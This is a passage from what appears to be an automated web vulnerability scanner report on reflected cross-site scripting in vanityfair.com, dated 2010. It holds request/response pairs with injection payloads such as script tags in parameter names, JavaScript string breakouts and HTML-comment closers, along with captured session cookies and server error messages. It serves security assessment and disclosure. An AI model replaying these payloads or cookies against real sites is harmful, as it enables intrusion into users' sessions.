GET /magazine/toc/contents-201010?1dc72"><script>alert(1)</script>2302b52587=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:36 GMT Date: Mon, 29 Nov 2010 16:49:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/magazine/toc/contents-201010?printable=true&1dc72"><script>alert(1)</script>2302b52587=1" title="Print this page"> ...[SNIP]...
1.159. http://www.vanityfair.com/magazine/toc/contents-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/magazine/toc/contents-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e583"><script>alert(1)</script>93660b63123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /magazine/toc/contents-201012?7e583"><script>alert(1)</script>93660b63123=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:37 GMT Date: Mon, 29 Nov 2010 16:49:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106081
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/magazine/toc/contents-201012?printable=true&7e583"><script>alert(1)</script>93660b63123=1" title="Print this page"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 499ce'%3b9cda7bf33ce was submitted in the REST URL parameter 3. This input was echoed as 499ce';9cda7bf33ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010499ce'%3b9cda7bf33ce/11/2010-gift-guide-light-bright.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:30 GMT Date: Mon, 29 Nov 2010 16:48:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010499ce';9cda7bf33ce/11/2010-gift-guide-light-bright.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 63ebc-->2091526e992 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/201063ebc-->2091526e992/11/2010-gift-guide-light-bright.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:32 GMT Date: Mon, 29 Nov 2010 16:48:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload c1707-->0c1946b2f8f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11c1707-->0c1946b2f8f/2010-gift-guide-light-bright.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:57 GMT Date: Mon, 29 Nov 2010 16:48:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... use bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[1575394975]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11c1707-->0c1946b2f8f/2010-gift-guide-light-bright.html?proxyuri=online%2Fdaily%2F2010%2F11c1707--%3E0c1946b2f8f%2F2010-gift-guide-light-bright.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5f22'%3bce033fecbd7 was submitted in the REST URL parameter 4. This input was echoed as c5f22';ce033fecbd7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11c5f22'%3bce033fecbd7/2010-gift-guide-light-bright.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:54 GMT Date: Mon, 29 Nov 2010 16:48:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11c5f22';ce033fecbd7/2010-gift-guide-light-bright.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue gl ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e23b'%3bc787839530b was submitted in the REST URL parameter 5. This input was echoed as 8e23b';c787839530b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11/2010-gift-guide-light-bright.html8e23b'%3bc787839530b HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:08 GMT Date: Mon, 29 Nov 2010 16:49:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html8e23b';c787839530b', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 8a32b-->0e45d1515ee was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11/2010-gift-guide-light-bright.html8a32b-->0e45d1515ee HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:09 GMT Date: Mon, 29 Nov 2010 16:49:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload ee519-->9c2304aacae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010ee519-->9c2304aacae/11/2010-gift-guide-original-keys.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:42 GMT Date: Mon, 29 Nov 2010 16:48:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47608
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc6d3'%3b61f82549449 was submitted in the REST URL parameter 3. This input was echoed as bc6d3';61f82549449 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010bc6d3'%3b61f82549449/11/2010-gift-guide-original-keys.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:39 GMT Date: Mon, 29 Nov 2010 16:48:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010bc6d3';61f82549449/11/2010-gift-guide-original-keys.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogu ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload c6935-->d45cae87ca0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11c6935-->d45cae87ca0/2010-gift-guide-original-keys.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:59 GMT Date: Mon, 29 Nov 2010 16:48:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... use bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[2128751646]:- Thread id: 40. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11c6935-->d45cae87ca0/2010-gift-guide-original-keys.html?proxyuri=online%2Fdaily%2F2010%2F11c6935--%3Ed45cae87ca0%2F2010-gift-guide-original-keys.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7f0b'%3bbb6e98289f8 was submitted in the REST URL parameter 4. This input was echoed as d7f0b';bb6e98289f8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11d7f0b'%3bbb6e98289f8/2010-gift-guide-original-keys.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:58 GMT Date: Mon, 29 Nov 2010 16:48:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11d7f0b';bb6e98289f8/2010-gift-guide-original-keys.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue g ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90d33'%3bc6e7d19006a was submitted in the REST URL parameter 5. This input was echoed as 90d33';c6e7d19006a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
